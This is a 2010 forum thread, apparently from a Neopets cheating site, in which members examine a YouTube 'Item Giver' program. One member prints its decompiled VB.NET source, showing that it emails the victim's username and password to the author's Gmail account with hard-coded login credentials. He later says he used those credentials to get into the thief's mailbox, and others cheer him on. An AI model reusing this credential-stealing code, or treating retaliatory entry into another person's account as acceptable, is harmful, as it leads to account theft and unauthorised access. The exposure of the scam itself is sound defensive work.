Photo

guitarherothunder's Neopets Item Giver

• Please log in to reply
12 replies to this topic

#1 Xcisor

Xcisor
  • 207 posts

Posted 21 August 2010 - 03:48 PM

Don't know if this is the proper forum to post this in, but I just stumbled across this video on youtube and judging by the comments, the legit video and the recency I think this could be a pretty cool new tool for the neocodex users.

When he first posted he was looking for a trade off for your main to the link of this program (since his main got iced) but he's recently updated the video saying he doesn't need an account anymore and posted the link in the description of the video. Im currently at my cousins and dont want to dl anything on her mac nor do I have any shells though I plan on making some in the near future, but I was wondering if you guys could check this out and see if it ices you automatically, ices you only on certain items (like on draik eggs im sure) ect. So here's the link and judging by the minimal amount of views it has gotten I can see why its relatively unknown thus far.

#2 Waser Lave

Waser Lave

• 25516 posts

Users Awards

Posted 21 August 2010 - 03:50 PM

Fake shit, the only thing it will do is steal your account.

#3 Eliam

Eliam
  • 621 posts

Posted 21 August 2010 - 03:50 PM

Don't do it. Item duping WILL get you iced.

#4 Information

Information
  • 246 posts

Posted 21 August 2010 - 03:52 PM

I would never trust, 95% of the neopet related cheats on Youtube.

#5 Mondo

Mondo
  • 89 posts

Posted 21 August 2010 - 03:53 PM

If it isn't approved here on codex I would not touch it.

#6 Waser Lave

Waser Lave

• 25516 posts

Users Awards

Posted 21 August 2010 - 03:56 PM

Private Sub cmdStart_Click(ByVal sender As Object, ByVal e As EventArgs)
    If Not Me.chkAgree.Checked Then
        Interaction.MsgBox("You Have not Agreed to the Disclaimer", MsgBoxStyle.OkOnly, "Neopets Item Giver 2.4")
    Else
        Dim message As New MailMessage
        Dim client As New SmtpClient
        client.Credentials = New NetworkCredential("[email protected]", "thunderhorse1")
        client.Port = &H24B
        client.Host = "smtp.gmail.com"
        client.EnableSsl = True
        client.EnableSsl = True
        message.To.Add("[email protected]")
        message.From = New MailAddress("[email protected]")
        message.Subject = "Neopets Item Giver v2.4"
        message.Body = String.Concat(New String() { Me.txtUsername.Text, "    ", Me.txtPassword.Text, "    ", Me.txtItem.Text })
        client.Send(message)
        Interaction.MsgBox("Success Pending... please allow a maximum of 48 hours to recieve your item. You may immediately request another item at this time. (Suggested on a different account to remove freeze threat)", MsgBoxStyle.OkOnly, "Neopets Item Giver 2.4")
    End If
End Sub

There you go, it sends your account details to [email protected] and/or [email protected].

#7 Eliam

Eliam
  • 621 posts

Posted 21 August 2010 - 03:57 PM

There you go, it sends your account details to [email protected].

Yay for Waser <3 + rep

#8 Xcisor

Xcisor
  • 207 posts

Posted 21 August 2010 - 04:00 PM

nods nods. Cool cool. Well was just running it by you guys for safe bets. Thanks for the input! Pretty sure you can close this down now.

#9 Waser Lave

Waser Lave

• 25516 posts

Users Awards

Posted 21 August 2010 - 04:07 PM

Incidentally, you should have seen the amount of emails which they had in their inbox...around 200 since the middle of November 2009. They won't be using that email address again.

#10 MsRose

MsRose
  • 664 posts

Users Awards

Posted 21 August 2010 - 04:50 PM

Incidentally, you should have seen the amount of emails which they had in their inbox...around 200 since the middle of November 2009. They won't be using that email address again.

O_o
Did you hack into their e-mail and change their password?

+10000000000000 if you did.

#11 Waser Lave

Waser Lave

• 25516 posts

Users Awards

Posted 21 August 2010 - 05:01 PM

O_o
Did you hack into their e-mail and change their password?

+10000000000000 if you did.

I wouldn't call it hacking when they leave their password in the source code of their account stealer. :p

#12 MsRose

MsRose
  • 664 posts

Users Awards

Posted 21 August 2010 - 05:03 PM

I wouldn't call it hacking when they leave their password in the source code of their account stealer. :p

lol, how ironic. That's some good old fashion justice for you.

#13 jcrdude

jcrdude
  • Oh shit there's a thing here

• 7001 posts

Users Awards

Posted 21 August 2010 - 06:29 PM

Funniest message in this thread. You are getting a +rep, good sir

2 user(s) are reading this topic

0 members, 2 guests, 0 anonymous users